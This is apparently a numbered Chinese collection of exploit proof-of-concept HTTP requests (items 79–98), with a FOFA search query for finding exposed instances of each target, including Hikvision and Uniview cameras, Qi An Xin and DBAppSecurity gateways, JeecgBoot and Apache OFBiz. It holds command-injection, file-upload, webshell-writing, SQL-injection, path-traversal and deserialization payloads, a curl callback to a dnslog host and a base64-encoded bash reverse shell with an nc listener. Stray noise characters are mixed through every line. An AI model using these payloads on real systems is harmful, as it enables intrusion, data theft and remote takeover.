9 f& G6 t* P- ]------YsOxWxSvj1KyZow1PTsh98fdu6l--9 s8 y* M7 t2 ] h
]( i) e+ i" K4 C7 s# i
N9 q; y4 r5 K9 E& U) ~* YGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1# g4 U- M$ l$ [6 ~2 t
Host: x.x.x.x
+ k& k% Z6 \. A7 \$ m
5 `8 h, Z4 `- {: A$ s/ ?! B- q) u1 f: E: r9 y
79. BYTEVALUE 百为流控路由器远程命令执行
6 ~ l2 p3 r, U' ^; h+ h+ X jFOFA:BYTEVALUE 智能流控路由器
* m1 Y! i I; v& S4 b% bGET /goform/webRead/open/?path=|id HTTP/1.1
p, A1 i c) j. n1 H8 ?3 bHost:IP: C+ p& g0 ?: i S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0- R6 j: ?1 i# m2 H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! y7 t* A) Z o& d5 f! i/ j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 k. L H' d d/ M% FAccept-Encoding: gzip, deflate
( B4 C4 z1 c( w; Y; o' s: D/ ~2 fConnection: close
( E$ a- z c4 T2 U! r' BUpgrade-Insecure-Requests: 1
& n/ w9 ~& }8 d) e% I
C k7 E2 G" Y* L5 E5 L5 p2 U, U. m! N K* C- @" t
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
% f, b$ }, G% a0 @: y% uFOFA:app="速达软件-公司产品"# [" x+ L% p8 V: T. {0 H
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1& _9 [; B1 f/ I* a y
Host: x.x.x.x9 [2 A; e( q$ l- \* t% U0 b
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. J* o7 a7 Q( W- `/ C- S7 jContent-Length: 27 S, O2 X9 T& O6 p9 W9 r4 c* r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 o) S ^4 f- ?. M/ r g7 s( N. pAccept-Encoding: gzip, deflate; a1 a9 J" ?. X* u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: f$ k5 c/ y' ^9 p7 j7 [) b
Connection: close0 o) l8 _9 ?8 v+ z4 M7 A
Content-Type: application/octet-stream
7 c; j5 `$ @5 qUpgrade-Insecure-Requests: 1
' _' [6 t/ ]! n$ B% w; D* A8 {+ U p2 }/ A" D0 R$ D
<% out.print("oessqeonylzaf");%>
* F- n4 E* J: {) `+ {5 J4 ]/ D2 `; Z% E' K1 X z: @4 O
& c. v# @8 y U* Z, eGET /xykqmfxpoas.jsp HTTP/1.1
% k. ^5 I* w' k: @. k& D' ?Host: x.x.x.x
4 H2 P6 @/ o; ^9 \" I6 D5 d& |User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' }( p, a9 s) |5 P/ `# ?, D
Connection: close' s1 Z1 }* ], _9 ?
Accept-Encoding: gzip
7 ~/ V3 I$ z& c1 W: X8 Q0 G3 y; w9 B. j: h
$ b: ~5 X: `+ X- g" s" G. ]
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露8 }* B ?7 r s# o7 y6 H: d& i
FOFA:app="uniview-视频监控", g' D0 e5 }/ Y$ k
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1/ A) }. l! ^0 S! G$ F& M6 d
Host: x.x.x.x
8 k! I7 O# s/ v2 I. H$ g ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! ?" h% C- X$ [; w7 w) t5 E0 g' P
Connection: close
! b: h: Q7 u3 [Accept-Encoding: gzip O* `5 v# i0 Q2 [
0 j/ s; w8 s7 y6 P; Y4 H X
) p" g0 J# Q7 }! R82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
# Z0 x6 U4 A' ^$ s( U7 }) z2 RFOFA:app="思福迪-LOGBASE"
C$ E) w& u* a$ |; B6 NPOST /bhost/test_qrcode_b HTTP/1.1
+ r3 T6 k G3 y5 X" g7 gHost: BaseURL: `# a% Q" i* ?" Z( F5 l
User-Agent: Go-http-client/1.1
, F; u+ y. n! i3 q8 p/ v5 ]4 [Content-Length: 237 O/ l7 T8 W5 x2 O) o
Accept-Encoding: gzip
" a! z, s0 I/ E0 ^Connection: close7 f, ~; H% y: X2 g# D" P
Content-Type: application/x-www-form-urlencoded6 C. s3 `+ |. [
Referer: BaseURL% a* U3 C- g- @( \% s* m8 e
2 G0 U' B0 o0 O; \; a0 W8 B3 q
z1=1&z2="|id;"&z3=bhost6 d0 k7 a h+ x# _& R
/ a/ g5 H6 I: _, L" o* `$ g0 d' ]9 _2 a; @" U4 B8 S9 @" t
83. JeecgBoot testConnection 远程命令执行! Q% s0 L, w7 }, N2 ^3 i& s
FOFA:title=="JeecgBoot 企业级低代码平台"2 U- X1 A/ P! a. u+ ^2 M$ |
7 a# P) T$ c( B ?, a& R" X' C9 b. L1 E6 I
POST /jmreport/testConnection HTTP/1.1
; x! o+ Q4 H; bHost: x.x.x.x x' q3 }! [6 I/ V* b1 Z ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 t7 ?. w( q6 F# @9 p0 ?
Connection: close& p% }; v, O2 L! C9 }
Content-Length: 8881/ `0 n. ~; X- z6 A0 y
Accept-Encoding: gzip
0 j1 [# `+ V z t+ @Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
& b: ]/ B% S- ^( ]/ K# _Content-Type: application/json
2 g, L( Q+ e/ F9 g
5 }) ^0 n3 {3 X+ C& Z ?3 PPAYLOAD
7 w. @" T. R7 e4 k3 s& ^ \) i1 B4 V* `0 Y4 x: Y1 ^
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
% g* P+ P7 |$ J U" wFOFA:title=="JeecgBoot 企业级低代码平台"
2 _6 u! D0 l1 L3 K1 j( K* B/ t0 ~5 U4 W! O3 k" j% p- Y
' Q% I* _( j- `8 Y/ t
' l [; F- u, L t6 i$ LPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.13 S% u! j8 C, S
Host: 192.168.40.130:8080) J+ ^; T4 C' _) \
User-Agent: curl/7.88.11 G3 a& T3 L, ~- ^ T" R* A+ H4 d
Content-Length: 156
! o3 ~+ s2 _# S# H2 ~Accept: */*
* ]8 x/ {$ b) _. p4 }( V: uConnection: close
( ~0 `- W- u1 o, \6 y6 ^! DContent-Type: application/json2 G9 T- O! T1 J
Accept-Encoding: gzip) t+ _. P- M3 i, N) R0 b5 }+ H
6 t' |! L9 c# S; j1 }& L) `( C! v
{
8 Y, j# ~6 X6 d+ E9 `: q "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
5 [ d2 G- G7 L9 H) J- m0 R- [ "type": "0") ~9 M; @* ^# J! X- G" O1 K
}
h+ i) x7 \3 n( z. y; e; _2 C) |4 Y
/ w$ y; M1 S2 p' |85. SysAid On-premise< 23.3.36远程代码执行
. M1 E N7 W- C5 _( OCVE-2023-47246
8 z" Z- k* j, d8 d$ m' P8 t5 ]. w3 Q5 EFOFA:body="sysaid-logo-dark-green.png" $ y j- V: B5 J+ S! e
EXP数据包如下,注入哥斯拉马
6 ?7 o1 T. g; r: r. G) @5 I1 UPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
5 E3 L1 ]. Y& J# e: HHost: x.x.x.x; v2 `7 d2 n9 @& @: n: D( w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 B! w; @' t# c$ P
Content-Type: application/octet-stream: @% Q$ P7 Y0 {1 d! X% l0 \
Accept-Encoding: gzip; d8 y( t0 q+ E a4 ]% g" u" j
+ | E( E+ @! O0 V! k: `( L
PAYLOAD6 l4 J' A) U7 z. C% R4 T
2 @! p) F t2 J5 S0 w$ t7 R回显URL:http://x.x.x.x/userfiles/index.jsp
3 G& x3 U* g- d8 k! }
$ v: r7 s7 S0 ]& a% t86. 日本tosei自助洗衣机RCE
: U/ `: c7 B6 R: M4 ZFOFA:body="tosei_login_check.php"9 H1 d$ G+ `" `7 m# z4 y5 {' U/ N
POST /cgi-bin/network_test.php HTTP/1.1
' f. M4 j& T; ]7 Q/ Y# OHost: x.x.x.x# l6 _( U6 [, X# H# X( i
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
; |/ z) f, }' _( o( d: T2 |# JConnection: close& ]' P2 ^7 u1 \4 f9 [" i
Content-Length: 441 m8 G1 Y3 B9 Z3 v0 }8 G' E4 c
Accept: */*
/ L0 c& ~; ]4 HAccept-Encoding: gzip( r: ~1 y4 ?! O5 |1 a& F
Accept-Language: en
, _3 d$ g2 m' t6 e: K+ y$ OContent-Type: application/x-www-form-urlencoded
( V" S: D/ z; C6 _" e1 s- G
: T7 _. B' B: b \- a" Shost=%0acat${IFS}/etc/passwd%0a&command=ping
9 y8 Q( L9 q+ y5 L( P7 n6 e( O9 u u! d7 J" x' W. O
5 |* {! X/ g! L4 R" {$ @5 F4 ?
87. 安恒明御安全网关aaa_local_web_preview文件上传
' P4 z" O' z9 \; S5 zFOFA:title="明御安全网关"& x% X H( V# h# Z& K" W% M
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
) f C1 u* A; i; F5 nHost: X.X.X.X4 S: `" F9 G2 O4 _. {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
/ H" h3 k6 H+ f) yConnection: close
% w9 B: S6 o: f5 P! g- k0 tContent-Length: 198
' U& _% g* p% n$ s/ C, EAccept-Encoding: gzip& i! G$ X( A" }1 a7 B9 }- k
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd) }: f4 R4 T. l( P3 d' P
0 l. P3 j& ^# a1 N--qqobiandqgawlxodfiisporjwravxtvd
. E; c. w$ i8 c* s: {9 C3 CContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"0 Q2 G; {8 n) }) f9 K& t5 w* k4 f
Content-Type: text/plain
4 u) l8 Q+ Q4 x1 S, E& b0 B2 {, w
2ZqGNnsjzzU2GBBPyd8AIA7QlDq
5 Y; n! Y" m) `& Y! z# y8 B--qqobiandqgawlxodfiisporjwravxtvd--
* |# E3 A" B( P( o$ U3 K
6 `5 z, u& i1 w) D5 M2 Q" ]% Y, t% A+ l
/jfhatuwe.php+ y* R% S, A1 h5 C
# h$ ]8 ~: o0 {88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行6 q! g! d: A' {( m6 g+ e: x
FOFA:title="明御安全网关"
k7 U/ z% M+ Y( OGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
7 N, l( N& e1 k0 Q% I# H( wHost: x.x.x.xx.x.x.x$ w# b& c. J! v K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& x' v& J, ~- a8 Z9 M: B! {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 N7 D% o5 l& l7 G1 t5 m
Accept-Encoding: gzip, deflate
; q! {' Y6 P6 j1 D* RAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ a( m8 \) t4 T: g9 L" T2 z( nConnection: close$ H& q) {- s4 X# d7 @) M
& J( [6 d% {: S' d
- J9 M+ X7 W( @0 x. S
/astdfkhl.php
9 z' b! Y: y5 i5 s) ~3 ~+ g5 a$ F6 W3 U. l9 i/ X$ L# \' _& k
89. 致远互联FE协作办公平台editflow_manager存在sql注入
6 _& j8 l2 K% l- PFOFA:title="FE协作办公平台" || body="li_plugins_download"
/ i4 F# [8 Q# L! kPOST /sysform/003/editflow_manager.js%70 HTTP/1.1. |- W' m! U9 m9 ~" L. K
Host: x.x.x.x& u4 R8 k" @/ Z6 i# o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.159 a/ {& C. K! t. j8 `, v. J, ^
Connection: close' S1 K: j2 u: y0 D
Content-Length: 41+ k, L+ X* z( b5 x9 Y
Content-Type: application/x-www-form-urlencoded/ R5 U# v2 q7 @2 ~1 w `
Accept-Encoding: gzip9 ^3 D7 j. a; l$ {
2 Y4 h; Z& g+ \1 @: M4 A8 F/ ooption=2&GUID=-1'+union+select+111*222--+# U9 u3 }7 l- I; Q
1 Y) ?# ]/ s: R q. ]) [7 X p, b
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行- o' c' ~. V6 A* t
FOFA:icon_hash="-1830859634"
& q, [$ {1 n1 g2 x' k- B$ bPOST /php/ping.php HTTP/1.13 I, u7 v' O, o6 s7 @
Host: x.x.x.x7 K/ j+ }' V+ F0 k1 p& w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
5 S/ K6 p7 @! M. eContent-Length: 516 }; p1 a9 C- R; |
Accept: application/json, text/javascript, */*; q=0.01
. y9 u1 \/ p' K% _4 }8 t8 {* NAccept-Encoding: gzip, deflate: H. J* N2 v3 |; Y; \* @. Y; C
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ F$ X6 B7 [, a$ X3 r
Connection: close
4 x# _+ w! L% T( _Content-Type: application/x-www-form-urlencoded
. ^( q+ |! E5 ~3 p9 OX-Requested-With: XMLHttpRequest y5 C) P5 E: o4 }9 u2 R; `
9 m6 |! j6 y4 \; ujsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
" M O. @2 r, V/ D8 ~* k& b) ~* g; ]5 b" i' U6 i/ c
( C1 K! D+ T& S e9 h
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取0 F: J0 l6 s, V! i
FOFA:title="综合安防管理平台"
" I' f! W4 L5 [- @( B D0 [. I' x0 XGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
4 ]3 B; s& a$ E' p# i5 E$ QHost: your-ip
/ {. V! J) h G. `) w, ^" \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
* l& r" ~ X* A6 S" F3 CAccept-Encoding: gzip, deflate6 t/ X& P9 J; a3 ?/ Z" u$ P- i
Accept: */*) W' z, g" K+ M$ Q; {0 i) m# q
Connection: keep-alive0 `' k; a6 E d8 A" {3 ^6 P7 m8 X' H
( ]- S0 ~/ R. X" c+ A7 q9 `& p( _, N2 q, n
4 j- Z( U U( d; B" C$ t& k92. 海康威视运行管理中心session命令执行) t6 Z, u, F. X% W/ A% N( c; S9 k
Fastjson命令执行
, U, L9 u! L d. u Ghunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"" x- t9 e$ e- L' M+ r5 n$ ~
POST /center/api/session HTTP/1.1
( S9 v8 c% |: j) ?Host:
' n' I3 f) Z) I) G1 C3 Z9 o4 u. M0 DAccept: application/json, text/plain, */*
* V9 W9 J6 G! \; |6 PAccept-Encoding: gzip, deflate M" F) e9 S$ M; D \- H1 D
X-Requested-With: XMLHttpRequest
* Q" g2 t4 J$ \2 sContent-Type: application/json;charset=UTF-8* M, P9 h2 F' s6 |
X-Language-Type: zh_CN
8 G3 L! p1 D; h, L- ^9 E; LTestcmd: echo test
; q% N3 ^- [# Y9 _. c" ^& P, T4 X/ T$ sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.364 L% t R& e' @+ E# S7 r9 a
Accept-Language: zh-CN,zh;q=0.9. h5 u c# V/ v, z" g/ G( g
Content-Length: 5778( v) j3 _) {) a+ R& |+ F
. q! |# j' |1 l2 `8 Q; oPAYLOAD
Y0 W- \# l7 g4 X" _) Q9 B) P) R ?$ m& F3 l: W7 D9 i
' e' f# I# ?2 u9 m _' @' T
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
8 V/ C# c9 N2 }6 h7 P0 rFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="# b6 n2 y( q( d
POST /?g=app_av_import_save HTTP/1.12 c2 {8 P2 d( o! Y1 t
Host: x.x.x.x% ~; e0 L2 f; B7 c
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
! R! H$ d5 M# i5 L8 e, KUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
# Q$ r# B8 F/ L7 b! g2 k8 @; ~4 @
! {: n4 x8 X7 c3 ^1 U- J( e/ {------WebKitFormBoundarykcbkgdfx
$ ]; P: T1 [- [# wContent-Disposition: form-data; name="MAX_FILE_SIZE"
; X' ]* |9 I/ j! P/ b2 \0 z- Y# J! `6 N- T" P4 H2 D
10000000- d! |6 E1 s5 ^7 w% v: L
------WebKitFormBoundarykcbkgdfx
( E3 K. H; b9 D7 {$ c" o3 J" T/ BContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"1 Q2 @: \: Y' Z" X- A
Content-Type: text/plain# A0 ~9 U; ~3 B& n+ F. `$ U
- ^8 W# f# x: J/ x8 j6 R
wagletqrkwrddkthtulxsqrphulnknxa
" q3 ]$ s$ N$ F------WebKitFormBoundarykcbkgdfx
' f' ~- r& [* N# r( HContent-Disposition: form-data; name="submit_post"% S; _' ~7 i" W* g
7 l( ^) ^9 n+ k% [ j6 \
obj_app_upfile+ w0 S" f" ^" Y: b L; d* s) L
------WebKitFormBoundarykcbkgdfx
& i5 \3 M% c8 f; PContent-Disposition: form-data; name="__hash__"
( V* T' n0 v0 G! {2 p1 d2 ?7 t6 e' s( \
0b9d6b1ab7479ab69d9f71b05e0e94457 V9 [2 U. O0 o7 t1 I9 O
------WebKitFormBoundarykcbkgdfx--
- m" h8 U+ p9 }1 l3 p; u9 J; e$ H, O4 y2 x% t l; h) z, G
5 v4 _) {3 v6 n: `1 H# ^
GET /attachements/xlskxknxa.txt HTTP/1.1 E4 A* M! ?/ z7 J
Host: xx.xx.xx.xx
. s+ y7 k8 j& s; z5 v; @7 ZUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
% X9 K( @% d9 Z
t0 J$ t: ]0 P# z V) Z# K2 u1 y
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
- G! `# X9 | X) g; OFOFA:fid="1Lh1LHi6yfkhiO83I59AYg==" x6 q7 a6 S# c6 t5 X0 x
POST /?g=obj_area_import_save HTTP/1.1
7 d+ S9 R" H' Y& w4 `Host: x.x.x.x
" k! }3 `- I: N! W+ fContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt6 Y/ q( J7 M7 i% v# X5 L# h" ]( a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
4 J& Q2 A" m4 w/ J! U+ r+ Y
- f! m$ X/ f6 A, a------WebKitFormBoundarybqvzqvmt% C0 A6 ]8 }. F, L" A, o% ?
Content-Disposition: form-data; name="MAX_FILE_SIZE"
" |" i& y! C& q, w# l. _8 s6 s# d; p3 b8 n1 \1 X2 I* u5 f
10000000: z" v) \( {( i. L
------WebKitFormBoundarybqvzqvmt
- P3 d4 |, b; r( Y8 c: k* L' BContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"' g0 }/ e- i# u, l- [
Content-Type: text/plain
: i- G# M1 Q# j. S$ U" h4 t( i% z4 R+ \* f/ o% b, h! v9 l# T% e1 C
pxplitttsrjnyoafavcajwkvhxindhmu$ |' E$ K# ^ H2 J+ e
------WebKitFormBoundarybqvzqvmt
5 c' V1 E1 b! x* OContent-Disposition: form-data; name="submit_post"
% G4 R4 K' a6 K8 p5 d1 x
. G8 A/ O, g$ aobj_app_upfile8 l' P. U3 g q- n6 i. U
------WebKitFormBoundarybqvzqvmt
+ u( U0 X. m* y) k9 O8 F. AContent-Disposition: form-data; name="__hash__": h! T, F: Y5 G0 m6 Y/ r
$ x/ `- l4 i5 ~, `2 Z2 f
0b9d6b1ab7479ab69d9f71b05e0e9445) L2 B1 {. D v/ o9 d. [4 F C6 m9 s
------WebKitFormBoundarybqvzqvmt--
; C' ]$ \+ }2 L* x+ Y) `2 h
& q$ V! e6 K! k, U$ r& J- |* c" X4 \+ e
1 [2 T/ C" T5 C- f% oGET /attachements/xlskxknxa.txt HTTP/1.1/ e4 W J# m; a+ m+ F) J! @+ J4 D' Y
Host: xx.xx.xx.xx+ m1 j I7 d1 W( I$ Z4 l/ i* O9 M; f4 {
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 b- |- D3 ~' s( I
" B, D) A7 B" |9 W1 t. A
0 ^. M0 e7 g. I0 w# c
7 v! X; z; r4 _. l* f
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
- @- }7 [* }$ `0 i6 s: X/ d4 ICVE-2023-49070: l* z6 D" A& v1 \
FOFA:app="Apache_OFBiz"
9 ?+ M0 u* Y: F$ i) `: C+ l }1 pPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1+ S& J/ p, M/ n ` ~
Host: x.x.x.x
+ i; }( o+ e0 H+ A8 D" m- Z7 CUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36, u/ O1 a5 L. W
Connection: close: I2 @, J. M, x* J$ E( `4 r% x y
Content-Length: 889
$ V" f! l" k4 B: W8 P' m+ BContent-Type: application/xml/ q% d; O9 T1 F
Accept-Encoding: gzip5 T" a, s* d) ]6 k6 F
/ Q1 s w9 j, S& N
<?xml version="1.0"?>7 i% }/ h( m( k+ U
<methodCall>7 d1 Z* V5 g( X) N3 O% T3 D4 [
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>! g4 |+ O; \# b
<params>( \# Q. u7 r, Z# K* U; h/ e
<param>9 L3 s. \/ S: ?8 v8 |
<value>% o& V1 x; Z/ Z$ @
<struct>% p0 {# h0 M& A# _8 k9 T
<member>
4 \5 C: D5 }: w: X% Y* d- f <name>test</name>( @( B% _" ^1 ?7 l: A
<value>
1 [, w l* ^5 f. k <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>* w' A% @0 Q6 |9 l* u
</value>) ?% T2 n& B5 T( N& _7 W
</member>
; [& e5 C4 @& _8 T5 a/ d </struct>3 f% _! y; H/ K/ ^# Y7 h p
</value>2 N7 O& |% a) ^: T/ m7 y3 W$ U3 ]& q
</param>
! {8 N. c9 v5 S% u- u8 Q </params>
- T1 z0 P: I( j3 ^* f7 B, K @</methodCall>* W4 u+ S/ u! [
: D" v- p+ B1 y* p" Y7 n, X. ]: s0 R5 z5 Q
用ysoserial生成payload- [6 e% ]( P) x% ]/ Q6 T
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"/ K0 u1 _( f4 B0 P
( m4 s# @+ ?( Q3 Z
3 [( Y* u2 g. a* M+ g& g
将生成的payload替换到上面的POC. z% H6 M0 T" \5 D* N+ `1 _* N8 z
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
0 |) g, R. x' g2 w/ a4 AHost: 192.168.40.130:8443
8 S% v. s# P3 W! ^User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
" o4 a5 A( y& \# aConnection: close
6 [9 |& W& [) i y3 |6 zContent-Length: 889: O$ g' B$ {+ H! {& a' G
Content-Type: application/xml
5 M/ z. o1 v" p+ XAccept-Encoding: gzip
?4 _( c* u, ^, e3 a0 O
; q6 z" i) ?- k8 D. p. oPAYLOAD
1 L5 k7 k8 Q! e
% S% q& B: G3 G" w+ e7 d% P96. Apache OFBiz 18.12.11 groovy 远程代码执行1 ^, k( n2 a9 c, y! o( K% M; N# r0 h
FOFA:app="Apache_OFBiz"* u2 i6 M" m1 t$ n5 p* Q
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1" [) ~4 ]! ^4 \( O
Host: localhost:8443
& b& H# Y" E' M! i! p2 U% @" FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0/ Y) l, s! K2 J& l# x
Accept: */*
6 `/ F8 b. ^4 v5 T: T0 E) b0 e3 YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 m3 }8 ], i& p2 W: i4 x
Content-Type: application/x-www-form-urlencoded1 T# w2 E V( G9 N; _
Content-Length: 55
* ]1 J: H" ]0 }2 E# R8 V' H
. N# f( p) r2 o6 {5 ugroovyProgram=throw+new+Exception('id'.execute().text);
+ D& T) H. h! y; ?' U7 X- S2 `3 y* w N5 h b& V
8 _2 e7 Z% _. S6 A+ t# v反弹shell4 f: v) ?% _5 k0 h* x
在kali上启动一个监听1 c1 m2 V9 X) W- o6 v
nc -lvp 7777
) J' |) ]3 J5 j6 `2 Z& B3 B
% Y; X0 Y' ?0 e/ @POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1& M! A6 s9 Y T% R0 p, a1 y' e
Host: 192.168.40.130:8443
( @. Q( \! n* }- v2 m& k( jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
! u' q, I4 k! z' Q8 cAccept: */*
1 j6 y: v s+ D( E; n) Z% zAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% Z- l& b* H7 h# x0 C- A1 l$ g
Content-Type: application/x-www-form-urlencoded
/ B% Y+ F& Z* mContent-Length: 719 g! h% D3 _) s& O
6 F$ {( }) |5 q5 f' V$ d& t
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
$ Z' M) n2 `0 n9 i+ p) j/ Y# t
+ w: a! O8 b! `97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
& \& t' X' Y% j* n# [FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"& ]0 J9 i) n# E3 W8 D; g+ m
GET /passport/login/ HTTP/1.1' n9 W7 }" i/ _1 J; C# [2 p
Host: 192.168.40.130:8085
; ]1 v0 d7 i x/ J) F6 A; ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" B$ @& v0 i3 x) k
Accept-Encoding: gzip% _/ w" d ?& O4 N4 |' t9 l
Connection: close) ]3 w$ p- t: n1 e- _- q
Cookie: rememberMe=PAYLOAD+ m& y4 y8 @: g9 `, n8 v
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
* L) |$ D2 v5 S" C0 m
! J, @! N, |8 p% k
' ]1 p/ S/ N* a. P# \# J$ Q98. SpiderFlow爬虫平台远程命令执行
( U) T1 j6 c/ P# x9 e4 g* p. ~- C) eCVE-2024-0195
; C5 }: i e* q4 I) P& JFOFA:app="SpiderFlow"3 j4 c, U: @+ k1 \" U; G- x2 Z
POST /function/save HTTP/1.11 s/ n, B7 M1 A/ q. T. J6 C
Host: 192.168.40.130:8088
' ^+ y, H8 Y2 MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
) d0 q! |: ?1 _Connection: close
4 y5 \, }: C, dContent-Length: 121
- _* M3 T- h; d2 @; k2 H% ?Accept: */*
